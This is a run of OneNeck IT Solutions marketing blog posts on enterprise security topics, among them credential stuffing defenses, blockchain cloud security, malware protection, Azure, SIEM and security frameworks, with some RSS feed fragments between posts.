Credential stuffing is a type of cyber-attack where hackers take combinations of usernames and passwords leaked from other sites and use them to gain access to accounts on another site.  F5 states that there’s typically a 1 to 2 percent success rate, which means that if a cybercriminal purchases 1 million stolen credential records (for sale on the dark web for fractions of a cent each), they can generally gain access to 10,000 to 20,000 accounts.

Costly Ramifications

In a recent Ponemon Institute survey, respondents cited that these attacks cause costly application downtime, loss of customers and involvement of IT security that can result in an average cost of $1.7 million, $2.7 million and $1.6 million annually, respectively.

In addition, the companies represented in this research estimate that the monetary cost of fraud due to credential stuffing attacks can range from an average of more than $500,000 if 1 percent of all compromised accounts result in monetary loss to more than $54 million if 100 percent of all compromised accounts result in monetary loss.

Main Culprits

Password reuse.  According to Keeper Security, as many as 87 percent of people reuse the same password across multiple accounts. And while they may not share passwords with others, they use them across multiple websites, making it easy for cyber-criminals to break into the various accounts with the same password.  In addition, Ponemon also states that companies are vulnerable to credential stuffing attacks because:

• It’s difficult to differentiate the criminal from the real customers, employees and users who have access to the companies’ websites.
• Migration to the cloud is an important IT strategy, but it increases the risk of credential stuffing attacks.
• Companies do not have sufficient solutions or technologies today for preventing and/or containing credential stuffing attacks.

How Can Companies Prevent/Mitigate Credential Stuffing Attacks?

Companies who wish to prevent credential stuffing attack must take a layered security approach.

1. Web Application Firewall – Your First Line of Defense

A robust web application firewall (WAF) is the first line of defense against credential stuffing attacks. A WAF can provide advanced bot detection and prevention. By analyzing behavior, such as IP location, time of day, and connection attempts per second, a WAF can help you identify non-browser login attempts.

2. Embrace Multi-Factor Authentication

Multi-Factor Authentication works to thwart credential stuffing by requiring additional information or credentials from the user to gain access to corporate data.  MFA doesn’t stop all types of attacks, and it doesn’t guarantee security, but it does add additional layers of authentication that make cyberattacks more difficult.

3. Educate Your Employees

Empower your users with some password management best practices. According to F5, the most significant takeaway for your employees is that no one should ever use network login credentials on any third-party site, because if that site is compromised, then cybercriminals will have access to your corporate network and any applications within.

Don’t Go At It Alone

OneNeck’s offers extensive cybersecurity expertise. We identify the gaps and provide remediation guidance, and a roadmap to face the future with confidence. In today’s accelerated world, you need a partner that helps keep you safe — so you can stop wondering if everything’s alright.

]]> https://www.oneneck.com/blog/security/blockchain-revolution-cloud-computing-security/ Tue, 26 Feb 2019 23:00:00 +0000 https://www.oneneck.com/blog/security-blockchain-revolution-cloud-computing-security/ Antiquated is not a word commonly associated with the advanced worldwide network of client-server configurations that make up modern data transmission. However, advances in data storage, file sharing and security protocols have struggled to keep pace with demands on infrastructure, cybersecurity threats and the ever-evolving competition that drives the industry. Fortunately, decentralized computing – a […]]]>

Antiquated is not a word commonly associated with the advanced worldwide network of client-server configurations that make up modern data transmission. However, advances in data storage, file sharing and security protocols have struggled to keep pace with demands on infrastructure, cybersecurity threats and the ever-evolving competition that drives the industry.

Fortunately, decentralized computing – a shared ledger system that eliminates server-side shortcomings entirely –  stands ready to completely overhaul the way modern businesses access and transact across their networks.

The Case for Cloud Computing on the Blockchain

Blockchain technology introduces a new paradigm in the world of security and data management. With the introduction of a decentralized network come the benefits of a virtually impenetrable infrastructure, free from the threat of DDoS attacks, data interception and localized disruptions. Blockchain systems greatly reduce the cost and vulnerabilities of previous systems. When combined with cloud computing, this new era is heading toward a truly secure and global marketplace for all businesses.

In addition to creating a more secure environment, blockchain-based cloud computing means companies can trust their valuable data in offsite scenarios without the need for costly intermediaries. The self-managed network is free from the constraints of expensive, single-point-of-failure systems. As a distributed ledger, information maintained across a blockchain network is copied and verified at every node, so that each office and user will know they are receiving the most accurate and current information. The kind of assurance provided by this self-reliant technology increases opportunities for multiple project leads to co-exist in the same space so that they can communicate and innovate with mutual cooperation.

Increased File Security

File security is another hazard of modern technology that is greatly improved via blockchain and cloud computing. Until now, no one has managed to develop a system in which sensitive data can be stored in a secure offsite environment, while also remaining freely accessible to those with proper credentials without exposing companies to external risks. Blockchain solves that problem by distributing data evenly across every node in the network.

Using advanced cryptography, all users within a blockchain network are granted immediate access to every iteration of data since the beginning of that ledger’s creation, while would be hackers are presented with the most secure integrity algorithm ever available to corporations.

However, beyond this, the basic structure of a blockchain system also has multiple additional benefits, including greater internal oversight. While blockchain’s security features were originally designed to prevent snooping from the governments of the world, they have since been adapted to the needs of modern business systems and are now virtually impenetrable from the outside. The sophisticated ledger process prevents tampering from the inside as well.

Since blockchain is based on a trustless system, users get the most accurate information as confirmed by other nodes on the network. This comparison ensures that no one can alter information for personal gain without controlling at least 51 percent of the active nodes, which in multinational scenarios would be incredibly difficult to accomplish. Data theft and corruption become a much less appealing option when faced with the digital footprints that are now impossible to erase without raising even more red flags.

Server hosting technology has grown by leaps and bounds over its short history, but newer technologies are pushing innovations that test the limits of hardware capabilities. With this research comes larger expenses and newer hardware that can become unfeasible for businesses working on a budget.

While cloud computing eases these issues by moving data off site and freeing up resources, it also introduces some security issues and can still present specific hurdles to integration when competing systems don’t communicate as desired. Blockchain cloud computing potentially eliminates the bulk of these issues while introducing an unprecedented level of interchangeability and accountability amongst nodes.

Distributed Apps

Perhaps one of the most interesting developments of blockchain adoption is the ability to construct and utilize distributed applications across the network that can streamline and unify business systems accessing the ledger. These apps integrate with the cloud to bring new levels of cooperation between the business processes already in place and the decentralized network connecting them.

From healthcare systems in which file management involves millions of individual records across countless data systems, to financial corporations operating in dozens of currencies on unique exchange protocols, to a manufacturers supply chain where precise tracking needs to be measured down to the second, distributed apps ensure a brand new level of accountability in data management.

Blockchain and the Future of Business

It’s quite clear that blockchain represents much more than cryptocurrency, but the story of how innovative organization will make use of it is still being written.

One area in which blockchain is already playing a significant role is the so-called Fourth Industrial Revolution or Industry 4.0. Combining blockchain technology with the industrial internet of things (IIot) will improve traceability and efficiency for the repair and maintenance of connected systems and equipment in smart factories. According to a 2018 Gartner report, nearly one-third of large manufacturers will have implemented Industry 4.0 projects involving blockchain by 2023.

Does your organization have a plan for the changes coming with next industrial revolution? View our interactive Industry 4.0 experience to find out about the opportunities, challenges, and IT solutions you should be considering as you develop a strategy to adapt and move forward.

While it is uncertain how much of our daily interactions will ultimately be controlled via the blockchain revolution, what is clear is that the underlying technology holds massive potential for modern interactions. When combined with the convenience of cloud computing, blockchain is an asset that further secures and enhances the promises of the decentralized world. It stands to reason that continuing this evolution will unveil even greater innovations as the process matures.

OneNeck takes pride in offering IT solutions for companies moving to the cloud. From hosted private cloud and on-premise private cloud to public cloud solutions, we can customize a design and migration plan for businesses in a variety of industries.

A look at retrospective security versus point-in-time solutions

With cybercrime predicted to reach $6 trillion annually by 2021 and to be more profitable—and therefore, more attractive to criminal organizations—than the global combined trade of all major illegal drugs, businesses can no longer rely on traditional network security tools and expect to achieve protection.

More than 75% of all current antivirus engines can’t detect advanced malware

The hackers of yesterday knew only as much as they needed. Brute force was often their tactic of choice, requiring only minimal coding skills, an Internet connection and a criminal mindset. The Industry responded by developing Antivirus (AV) and Intrusion Prevention System (IPS) solutions that were adept at detecting and responding to these primitive though damaging cyberattacks. However, over time, hackers grew more sophisticated and began to employ new techniques to create advanced malware.

These unconventional hackers learned to exploit flaws in traditional AV and IPS solutions, tricking them into making inaccurate assumptions about the safety of file attachments. And, once inside the network, traditional tools did not continue to monitor the files to ensure that they are truly benign. That’s when the balance of power changed between hackers and the rest of the world.

Point-in-Time vs. Retrospective Security

Traditional security tools that employ Point-in-Time Security Systems examine files attached to email and text messages only once, at the point of entry. The tool uses a preconceived set of rules. If the attachment meets those conditions and appears to be safe, the email or text and its attachment are allowed into the network. This method of security eliminates the majority of potential threats, but fails to protect against advanced malware techniques, including polymorphic and environmentally aware viruses that can dupe point-in-time security tools into assuming the malware is safe.

Advanced malware protection solutions use Retrospective Security Tools. These solutions examine files and attachments not only at the point of entry, but also monitor them for as long as they are within the network. This approach allows IT to gain visibility into the entire attack continuum by continually logging information. This establishes a record of the file and its effect on the network before, during and after an attack, empowering IT to analyze the event and formulate a course of action.

Retrospective security protects against modern cyber threats

As hackers change their tactics by using encryption, sleep techniques as well as polymorphic and environmentally aware viruses, IT needs security tools that offer visibility into their systems at any past point in time. The retrospective security solution toolbox also includes attack chain correlation, behavioral indications of compromise (IOCs), trajectory and breach hunting in addition to retrospection. This enables IT to see exactly how their network has changed, providing the context that point-in-time security systems cannot deliver, while also showing the malware’s trajectory as it had spread through the network.

The increased visibility from retrospective security enables IT to:

1. Methodically analyze what events transpired during a breach
2. Learn how their system was entered and what data hackers had accessed
3. Prevent similar future attacks
   

Retrospective security can also reduce remediation spending

In the event of a breach, an organization using a point-in-time security solution must engage a security consulting firm to perform forensics. However, if the company had instead used retrospective security tools, their IT managers would have access to all of the information necessary to investigate the breech and devise a strategy to tackle the security issue.

Defend against malware by increasing visibility into your network

While no network security tool can prevent 100 percent of malware from entering the network, an advanced malware protection solution using retrospective security tools can enable your organization to better secure itself against current and future advanced cyberattacks.

To learn more about how we’re working with Cisco to provide our customers enterprise-grade AMP retrospective security solutions, download:

INFOGRAPHIC: Real Threats Call for Advanced Malware Protection (AMP)

Extended support for Windows Server 2008 and 2008 R2 is coming to an end respectively on January 14, 2020 What does end of support mean for Windows Server 2008 & 2008 R2?

No Security Updates

Without security updates you may fail to comply with standards and regulations that can seriously hamper your ability to:

• Protect against hackers, malware with root access to machines, man in the middle scenarios, and government subpoenas
• Securely purge for customer data, leaving it vulnerable to access by outside parties

Compliance Concerns

At the end of support for Windows Server 2008 and 2008 R2, your system may cease to be compliant with regulatory standards, such as:

• PCI-DSS for credit card transactions
• HIPAA for medical patient privacy
• GLBA for financial institutions
• GDPR for companies who do business in the EU

Maintenance Costs

Staying put will cost more in the end. Maintenance costs for aging hardware will also increase, and customers will face added costs for intrusion detection systems, more advanced firewalls, network segmentation, and other security measures—all simply to isolate Windows Server 2008 and 2008 R2 servers.

Prepare For the Future Today

Don’t let the end of support for Windows Server and SQL Server 2008 sneak up on you—the impacts to security and costs are too important. Avoid business disruptions and use this as an opportunity to adopt the most current security and innovation technologies.

OneNeck help you prepare for Windows Server 2008 and 2008 R2 End of Support and take advantage of your current Microsoft investments and skills by running your workloads in Microsoft Azure.  Contact us today.

Organizations, big or small, are all grappling with combating the onslaught of security attacks, making security a top priority for today’s IT teams in every vertical. As Forbes so broadly states, “Cybersecurity is applicable to every business operation, whether it’s in the military, corporations or entrepreneurs.” And while cybersecurity decisions used to be contained to the boardroom or high-level government agencies, now the average employee is hyper aware of the potential risks a breach can bring.

Yet, despite the rising awareness, many organizations are still woefully unprepared to detect or mitigate an attack before it wreaks havoc on their business. While the entire workforce plays a critical role in a successful security strategy, ultimately responsibility falls on IT security leadership to ensure the confidentiality, integrity and accessibility of the company’s data.

This is a daunting scenario for security leaders who are overwhelmed by their list of to-dos. They can’t do it all and are struggling to narrow down the never-ending list of potential security projects. So, where should they start? “Focus on projects that reduce the most amount of risk and have the largest business impact,” said Gartner vice president and analyst Neil MacDonald.

But what if you don’t even know where you have the greatest risk and what the potential business impact could be? The answer could lie in having the right security expertise and leadership on your team. However according to salary.com, as of December 2018, the average Chief Information Security Officer (CISO) in the US is making $220,114, a salary that may not be feasible in most mid-market organizations. This is where teaming up with a virtual CISO (vCISO) may be a practical option.

How do you know if you could reap the benefits of a  vCISO? Here’s a basic checklist that can help…

• No Security Strategy – Are you lacking a defined security strategy? Or maybe you don’t even have a clear view of what risks you have and could use an outside perspective? If you are in need of a security architecture to use as a foundation to your security program and future roadmap, an up-front assessment is a great place to start.
• Too Many Tools – Is your organization protected by numerous, disparate (and often not integrated) security tools? For full protection in the cloud, thousands of end points and numerous entry points in an infrastructure’s perimeter, all too often tool after tool is deployed in hopes of fortifying against attack, only to lead to tool sprawl and unidentified gaps.
• Too Busy to Properly Execute – Do you have a defined security strategy, but can’t execute as well as you should due to constrained resources? According to recent estimates, there will be as many as 3.5 million unfilled cybersecurity positions by 2021, so you’re not alone.
• Great at Execution, but Lacking Documentation – Is your IT security team top notch at keeping your data safe, but less focused on the documentation? Information security management system documentation often gets back-burnered when pressing security fires arise, leading to audit-trail black holes when it’s time to meet compliance mandates or inventory information assets.
• Struggling to Meet Compliance Mandates – Are you struggling to meet your industry’s compliance mandates – ISO, CIS, NIST, PCI, etc.? With GDPR in May of 2018, compliance jumped to the security project forefront for many organizations, adding on to an already mounting list of requirements.

These are just some of the common challenges we’re seeing our customers struggle to address which has led OneNeck to offer our Virtual CISO services. While no two engagements are identical, the general purpose of the OneNeck vCISO service is to work with you to run a security control framework assessment and produce a gap analysis, then provide a remediation plan that addresses the vulnerabilities in your environment. We can also help with the remediation, so that depending on the agreed-to level of engagement, we’re there to help throughout.

Security can be overwhelming, and we want you to know you’re not alone. Interested in hearing how OneNeck’s vCISO service helped a customer improved their existing information security program and boost their overall security posture? Check out this customer story from Gila River Casinos.

Many IT leaders expect to see their budgets to increase or remain unchanged.  This is driven largely by the need to upgrade aging infrastructure, accelerate digital transformation via a shift to the cloud and enhance their overall IT security posture.

According to Spiceworks’ annual State of IT report on IT budgets and tech trends:

• Most companies (89%) expect their IT budgets to grow or stay steady in 2019.
• The need to upgrade outdated IT infrastructure is the biggest driver of IT budget increases in 2019.
• More than one-third of midsize companies (500 to 999 employees) saw IT budget increases due to corporate tax cuts.
• Small businesses are making significant increases to their hardware budgets while large enterprises are increasing their cloud budgets in 2019.

 Transform and Secure

“Most organizations are increasing IT budgets in 2019 to upgrade aging IT infrastructure and support digital transformation initiatives,” says Peter Tsai, senior technology analyst at Spiceworks. “However, large enterprises, typically with more data and devices to lock down, are primarily increasing budgets due to growing security concerns.”

Digital transformation was one of the biggest trends in 2018, and it looks like that will continue in 2019.  Businesses will continue to allocate IT budget towards technology that enables them to deliver on customer needs and improve security and impact.

With so many different technologies hitting the market, it’s incredibly difficult for any organization to truly know that one versus another is the best fit for their environment. your decision. In addition, they know that making the right choice of technology is only part of the challenge, as integrating it into your current applications and workloads without creating new complexities and risk is critical.

In addition, according to Spiceworks’ research, 88 percent of large enterprises are increasing IT budgets to tackle security concerns.

Why? Security is no longer “nice to have.” It’s an imperative. As critical systems and business processes become modernized, it also opens the door to risk. The same power that enables these technologies to radically transform business processes also brings the potential to cause gaps in security and loss of information if not properly secured.

 As with most major IT initiatives, digital transformation and security is an evolving journey. A seasoned partner can be an invaluable asset in guiding you on your path.  If your organization thinking about undertaking a digital transformation or security initiative? We can help, tell us about your challenge.

As organizations embrace the cloud’s flexibility and agility, Microsoft’s cloud platform, Azure, has become a top choice as a cost-effective solution that scales for any organization, no matter the size, to meet agility and flexibility needs.

In today’s sophisticated threat environment, security is a major concern consideration for anyone adopting the cloud. Organizations hold the ultimate responsibility for securing the cloud and need to adopt security solutions, enact best practices and set policies that will keep their data safe. Microsoft also understands the part they play in security and has powerful built-in features such as encryption and access management tools. Before deploying Azure in the cloud, organizations need to audit their security strategies to ensure they extend to the cloud environment.

Azure’s Security Features

Even before their 2015 $1 billion investment in security, Microsoft’s design of the Azure platform was guided by a revolutionary “security first” approach. Azure’s defense-in-depth strategy assumes that security breaches will occur and uses multiple, overlapping controls to prevent damage. In addition, Azure is back by Microsoft’s global incident response team to mitigate the effects of any attack.

Azure integrates a wide range of encryption for data in motion and at rest. Customers moving large data stores can also ship data to an Azure data center by hard disks encrypted using BitLocker technology.

For secure access to cloud applications, Azure Active Directory provides enterprises with a comprehensive cloud-based identity and access management solution and provides easy integrations between cloud and on-premise authentication infrastructures. IT managers can use the Azure Active Directory to simplify user and group management, integrated with security controls.

Incorporating Azure into Your Security Environment

Security in the cloud is a shared responsibility, and while Azure has strong security features, organizations need to understand how their data will be properly secured, whether in the cloud or on-premise — which requires advanced planning before an Azure deployment.

Key Steps to a Secure Azure Deployment

• Azure Account setup and management: Using Azure Active Directory for user accounts will provide centralized account management infrastructure to enhance security. Role-based access control (RBAC) limits access based on user’s job responsibilities and more granular access controls are available to create custom roles that will further limit access privileges.

  Added steps to secure privileged accounts such as multifactor authentication, using tokens or biometrics in addition to passwords, as well as restricting access based on network location prevents an attacker from gaining access to an account by stealing a password.

• Network security: In a cloud environment you don’t have direct physical access to the network but you can implement controls using virtualized technologies. With the Windows Azure Virtual Network, IT administrators can create separate tiers on virtual machines based on the sensitivity of the information that’s being processed, stored and transmitted.

  This essentially means you can build your own, virtual data center in the cloud and create secure and encrypted links, via virtual private networks, between the cloud and on-premise data centers.

• Other security tools: It’s important to extend your security practices to the cloud by implementing intrusion prevention technology, system configuration procedures, patch management policies, malware protection and so on. For the tightest protection, implement new tools that are designed to work specifically with Azure.

As a Microsoft Gold Certified and Microsoft Cloud Solution Provider partner, OneNeck can help you architect, deploy and manage your Azure cloud solution. Our team will support your environments 24/7, from initial design to ongoing management of your Azure infrastructure, allowing your organization to focus the right people and resources on your strategic business initiatives — all while increasing efficiency and overall productivity.

Download our eGuide Move Your Business Forward with Azure.

 Organizations are rapidly embracing cloud services to gain agility and thrive in today’s digital economy. This has created a strategic imperative to better manage cybersecurity risk while keeping pace at scale as firms move critical apps to the cloud.

Cloud security is a shared responsibility, where the cloud provider and the tenant each have a role to play. Although it sounds relatively simple, customers are often not clear where their provider’s role ends and their obligations start, creating gaps.

Download our Who Owns Cloud Security eBook, for valuable insights on what measures you and your provider should take to protect your cloud deployments.

Outsourcing is becoming an increasingly popular business strategy. By carving off business processes and giving them to outside vendors companies save money and resources. Outsourcing enterprise computing processes using cloud services, for example, allows you to hand off the cost and responsibility of maintaining on-premise hardware and software. However, just because you outsource your enterprise infrastructure does that mean your cloud service provider assumes total responsibility for your network? What about issues such as cloud security, which is a major concern for every IT manager and CIO? Can you hold your cloud service provider accountable for providing watertight data security?

As the use of cloud continues to grow, concern for data security grows with it. When data is an important business asset, management is hesitant to surrender control. However, it has been demonstrated over and over that cloud-based services tend to be more secure than on-premises systems. Most cloud services providers maintain rigorous security protocols for disaster recovery and protection from cyber-attack. Since providing secure and stable computing services is their primary business, cloud service companies use sophisticated tools to continuously monitor systems, identify vulnerabilities, and plug holes in cloud security. They also have service-level agreements (SLAs) to assure customers that security problems are remediated quickly.

So when you engage a cloud services provider you no longer have to worry about data security, right? Wrong!

Enterprise computing is more than just hosted enterprise hardware and services. Your cloud service provider is responsible for securing the foundation of your enterprise infrastructure; the computing systems, power, data storage, database, and networking. As the customer, you are still responsible for securing applications and related services.

Your cloud provider is generally responsible for cloud security at the network layer, including network segmentation, perimeter services, DDOS spoofing, and so forth. As the cloud customer, you are responsible for threat detection, security monitoring, and incident reporting. In other words, your provider offers cloud security for hosted switches and networks, but your responsibility is to secure the network applications and data traffic. Most SLAs are structured to make it clear that the customer is responsible for host layer data traffic, such as access management, patch management, security monitoring, and log analysis, i.e. any application security elements.

Finger Pointing Doesn’t Stop Attacks

Assuming that your cloud service provider will include comprehensive cybersecurity as part of their contract is a mistake. There are areas where they have control over the infrastructure and therefore can take responsibility for data security, but there are other areas that have to be the enterprise customer’s responsibility. Developing a collaborative cloud security strategy is the best approach to address risk management and deal with security threats.

Let’s consider some of the most prevalent security threats and where they tend to compromise enterprise networks. According to the 2018 Verizon Data Breach Report security issues affect both enterprise network owners and cloud service providers:

• 73 percent of attacks were perpetrated by outsiders but 28 percent were by insiders, usually employees. Maintaining internal security is largely the responsibility of the cloud customer, since attacks tend to be mounted against corporate targets and not cloud providers.

• 17 percent or one in five data breaches were from phishing attacks, which includes employees being spoofed into surrendering sensitive information such as passwords – again, the responsibility of the network owners, not the cloud service provider.

• Malware, especially ransomware, is one of the most insidious types of cyberattack. Ransomware attacks have grown 56 percent in one year, and many of these attacks are targeting file servers and databases, locking them until a ransom is paid. These types of attacks tend to target end users, but MIT experts predict that more ransomware is targeting the cloud.

• Inadequate identity and credential management is a universal threat. Stealing the right credentials is like having the keys to the kingdom for both corporate computers and hosted resources.

• Account service hijacking has become commonplace and affects cloud services and in-house systems. With the right account credentials, cybercriminals can eavesdrop on activities and transactions, return falsified data, and send users to bogus web sites.

• Infiltrating cloud services directly is also becoming more common. Bad actors are increasingly leveraging cloud resources to target end users or other cloud providers.

No matter what the nature of the threat, everyone has a role in protecting data assets. A data breach can originate from anywhere, and once the infrastructure is compromised the damage can spread to infect applications, hosts, and network systems. That’s why it’s vital that corporate customers and cloud service providers understand their areas of responsibility when it comes to cyber security.

 Develop Collaborative Cloud Security Strategies

To appreciate the respective responsibilities for cloud security, it’s best to start by understanding the cloud service model. Cyber-attacks will happen, so you need to know where your cloud service provider has responsibility and where you need to take charge of enterprise security.

For example, applications are completely your responsibility so it’s vital to secure your code. Whether you are supporting a DevOps coding environment or simply maintaining a basic website, you need to have security in place for the entire development lifecycle. Code that has not been thoroughly tested before it’s deployed could contain vulnerabilities. Use code encryption, testing libraries, and software to scan for bugs to make sure your code is secure.

Patch management is important, both for enterprise customers and cloud service providers. It’s the best way to address known vulnerabilities in software and production systems Cloud service providers will maintain patches for their systems, but you also need to have your own patch management protocols. Automated patch management and security scanning will help, but you need to have an established protocol to update systems software regularly.

Access management is another essential part of systems security. In addition to managing passwords and data access, you need to define roles and responsibilities to control sensitive data and systems. Defining roles and limiting access reduces the risk if someone’s credentials are stolen. Integrating your active directory (AD) and your lightweight directory access protocol (LDAP) authentication model into your cloud infrastructure will help contain data access. Also consider using two-factor authentication.

Ongoing monitoring and log management are important for regulatory compliance as well as for security. Reviewing logs provides an overview of data access and traffic patterns that could highlight suspicious activities. Logs also are useful for conducting forensic investigations.

 Matching Security to Different Cloud Services

When working with cloud service providers, you need to match your security protocols to the types of cloud services provided. Public cloud services, for example, are offered over the Internet and tend to be less secure, since resources such as computing time and data storage are shared. A private cloud offers dedicated connectivity and resources and is completely customizable, making it easier to manage systems security. Private clouds tend to be more secure but they also require the corporate IT department to manage more aspects of cloud services, which means more staff, more management, more maintenance, and more accountability for data security.

Depending on your cloud service needs, consider developing a cloud vendor checklist.

For Infrastructure-as-a-Service (IaaS) and Platform-as-a-Service, cloud vendors are responsible for securing the infrastructure and customers secure the applications. With Software-as-a-Service (SaaS) and Applications-as-a-Service (AaaS) the cloud provider is responsible for securing the applications as well as the infrastructure. However, SaaS and AaaS vendors often use third-party IaaS cloud services, which makes security more complicated. Be sure that your security policies and procedures (e.g. authentication, inspection, and monitoring) can be integrated with SaaS and AaaS services.

Hybrid cloud strategies that combine on-premise, private, and public cloud services are becoming more popular which means standardizing security across environments can be an issue. Security protocols will have to vary to accommodate each environment. Ideally, end users should be able to view and manage security across the entire infrastructure using a common set of tools, i.e., a single pane of glass. Unfortunately, that kind of security transparency isn’t always available.

When considering cloud service providers, be sure you are working with vendors that understand cloud security. That means they have cloud-based versions of security solutions, centralized security management, centralized event management, etc. Also look for vendors who work with leading cloud service vendors such as Amazon Web Services (AWS), Microsoft Azure, IBM Cloud, Oracle Cloud, and others. Cloud service contracts change and you want to make sure your security procedures follow you wherever your data resides.

Achieving security in the cloud is possible, but it isn’t guaranteed. Organizations need to implement their security policies and procedures in conjunction with their cloud provider to provide the highest levels of protection against cloud security risks.

Not sure where to start? Contact OneNeck IT Solutions to speak with our cloud security experts.

Early detection, rapid response, collaboration to mitigate advanced threats imposes significant demands on today’s enterprise security teams.

According to a report from the Ponemon Institute, of the 17,000 malware alerts the average organization receives weekly, less than a fifth are reliable. They also state that false alerts cost organizations $1.27 million annually.

It’s to no surprise that the overwhelming volume of alerts has cause IT teams in many organizations to experience “alert fatigue”

Alert fatigue is the threshold at which it becomes too difficult for IT teams to recognize the important alerts from the stream of everything that they receive, says Maxine Holt, principal analyst at the Information Security Forum (ISF).

But… threats aren’t going away anytime soon, and the number of endpoints your team manages is only going to increase, so how can you mitigate alert fatigue? Enter security information and event management (SIEM) technology.

What is SIEM?

Gartner defines SIEM as technology that supports threat detection and security incident response through the real-time collection and historical analysis of security events from a wide variety of event and contextual data source. SIEM

• Supports threat detection and security incident response through the real-time collection and historical analysis of a wide variety of data sources
• Supports compliance reporting and incident investigation through historical data analysis
• Is capable of broad-scope event collection and correlating and analyzing events across disparate sources

How Does SIEM Work?

SIEM software collects and aggregates log data generated throughout the organization’s technology infrastructure.

The software then identifies and categorizes incidents and events, as well as analyzes them. The software delivers on two main objectives, which are to:

• provide reports on security-related incidents and events, such as successful and failed logins, malware activity and other possible malicious activities and
• send alerts if analysis shows that an activity runs against predetermined rulesets and thus indicates a potential security issue.

 Connecting the Dots with SIEM

With SIEM technology in place, organizations can centralize, index, and visualize event data from multiple sources.  From this ‘single pane of glass’, SIEM tools show you actual, potential threats that your team can then investigate and triage.

SIEM technologies are not meant for teams to “set it and forget it.” The ongoing development and management of the SIEM is key to ensuring that an organization maximizes its capabilities for use in detecting threats.

The Advantage of a Managed SIEM

Managing a SIEM can be a daunting task…tuning the alerts, optimizing the reports, triaging alerts.

That’s why OneNeck^® IT Solutions offers a scalable Security Information and Event Management (SIEM) service for our customers. Our SIEM  service includes log aggregation, analysis and storage for most any type of system or device that generates log events or system log messages. In addition, we facilitate rapid incidence response, log management and compliance reporting.

Speak with a OneNeck security specialist today about how our comprehensive approach to SIEM can protect your data and your business.

Running a security program can be an overwhelming task. There are so many factors to consider including: encryption, application security, disaster recovery and let’s not forget adherence to compliance mandates such  HIPAA and PCI DSS .  How then do security professionals prioritize and maintain their efforts to build the most effective security program for their business?That’s where an IT security framework comes in.

What is an IT Security Framework?

A security framework is a comprehensive strategy for going toe-to-toe with potential threats while keeping data secure. It is a tool that provides methodology and a calculated process for assessing risk to determine where resources need to go to protect the information systems within an organization.

Examples of IT Security Frameworks

While there is a plethora of security frameworks out there, this blog aims to highlight the most common frameworks leveraged today including:

NIST Cybersecurity Framework

Created by the federal government, this voluntary Framework consists of standards, guidelines, and best practices to manage cybersecurity-related risk.  The Cybersecurity Framework’s prioritized, flexible, and cost-effective approach helps to promote the protection and resilience of critical infrastructure and other sectors important to the economy and national security.

ISO 27001 ISMS

The ISO/IEC 27000 is a key international information security standard aimed to help organizations manage the security of assets such as financial information, intellectual property, employee details or information entrusted to you by third parties.

ISO/IEC 27001 is the best-known standard in the family providing requirements for an information security management system (ISMS).

What is an ISMS?

According to ISO, An ISMS is a systematic approach to managing sensitive company information so that it remains secure. It includes people, processes and IT systems by applying a risk management process

CIS

The Center for Internet Security (CIS) Top 20 Critical Security Controls (previously known as the SANS Top 20 Critical Security Controls) are a prioritized set of actions that collectively form a defense-in-depth set of best practices that mitigate the most common attacks against systems and networks.

A principal benefit of the Controls is that they prioritize and focus a smaller number of actions with high pay-off results. The Controls are effective because they are derived from the most common attack patterns highlighted in the leading threat reports and vetted across a very broad community of government and industry practitioners. The Controls take the best-in-class threat data and transform it into actionable guidance to improve individual and collective security in cyberspace

Choosing the Right Security Framework to Fit Your Business

A structured approach to selecting a security framework starts with understanding the security requirements and risks that are unique to your business and your industry. Many industries including healthcare, government, education and financial have industry specific security compliance regulations they must adhere to.

If your organization is not bound by any industry specific mandates pick a framework and ride it. Ensure you educate yourself on the entire framework, but don’t overwhelm your organization and try to tackle every control at once.  Pick the pieces that you will have quick wins… in other words pick a control in which you can obtain quickly and start there.

Katie McCullough, Former Chief Information Security Officer at OneNeck, suggests that CIS top 20 is a great place to start.  “As noted by the CIS, its top 20 is relatively small number of prioritized, well-vetted, and supported security actions that organizations can take to assess and improve their current security state.” McCullough. “CIS Controls 1 through 6 are essential to success and should be considered among the very first things to be done. We refer to these as “Cyber Hygiene” – the basic things that you must do to create a strong foundation for your defense.”

Don’t go at it alone

OneNeck, is here to help you address the broad scope of security and compliance needs that today’s businesses face. We have a depth of experience in assisting our customers with their security needs, and our team is made up of security experts who stay current on the emerging threats so you don’t have to.

Understanding your security gaps is key to addressing regulatory obligations and protecting your organization from breach. We can help by conducting assessments designed to identify vulnerabilities in your IT systems and gaps in your security program, followed by a thorough gap analysis that will leave you with a roadmap to remediation and compliance.

OneNeck Security Assessment and Strategy services include:

• Cybersecurity Assessment
• Framework assessment & implementation
• Policies & Standards„
• Penetration Testing
• Vulnerability Management

Contact us to learn more .

If there’s any constant in today’s technology landscape, it’s change. And when it comes to security, there’s no rest for the weary. Advancing technology, savvier-than-ever users and the onslaught of attacks are making today’s IT teams scramble to keep up. Now more than ever, it’s critical to make sure the basics are covered so that you have the ability to respond and keep your business safe.

I recently sat down with OneNeck’s CISO, Katie McCullough, to discuss some of the key fundamentals organizations must keep in mind when developing a security strategy.

A few of Katie’s pointers were:

1. Keep your software up to date. This may seem like a given, but many organizations struggle to make patching a priority when they’re busy just trying to grow the bottom line. But much like the Equifax breach, many attacks are avoidable with routine and timely patching.
2. Educate and train your employees. The bad guys aren’t getting any dumber, and they know that phishing is still a great way to get inside your organization. No matter how many tools you have, if your employees aren’t trained to recognize phishing schemes, then no tool can keep you safe.
3. Compliance measures aren’t just an operational burden. It’s critical to document your processes, train your teams on those processes and monitor their adherence to build the solid foundation to keep your organization safe.
4. Develop and incident response plan. In the event that you do experience a breach, an incident response plan will help you know exactly what steps to follow so that you can respond quickly and mitigate the attack before it does even more damage.

These are just some of the tips Katie discusses in her Point of View Paper on security and compliance. If you’d like to read this insightful paper, download it now…

One of the big challenges organizations face today is complexity, and security is no exception. According to the 2018 Cisco Annual Cybersecurity Report, in 2017, 25% of security professionals said they used products from 11 to 20 vendors, compared with 18% of security professionals in 2016. Also, in 2017, 16% said they use anywhere from 21 to 50 vendors, compared to 7% of respondents in 2016 (refer to figure below).

As the number of vendors increases, so does the challenge of orchestrating alerts from these many vendor solutions. The report continues to state that 54% of security professionals said that managing multiple vendor alerts is somewhat challenging, while 20% said it is very challenging.

So, what is the result of this complexity in vendors and point solutions? The report finds that:

• Nearly half of the security risk organizations face stems from having multiple security vendors and products.
• 80% of organizations using more than 50 vendors had to manage scrutiny from public breaches.
• In organizations with more than 50 security vendors, 81% experienced losses of at least US$1 million—with 29% seeing losses of US$10 million or more.

And in a security vendor landscape that looks a lot like this…

What’s an organization to do?

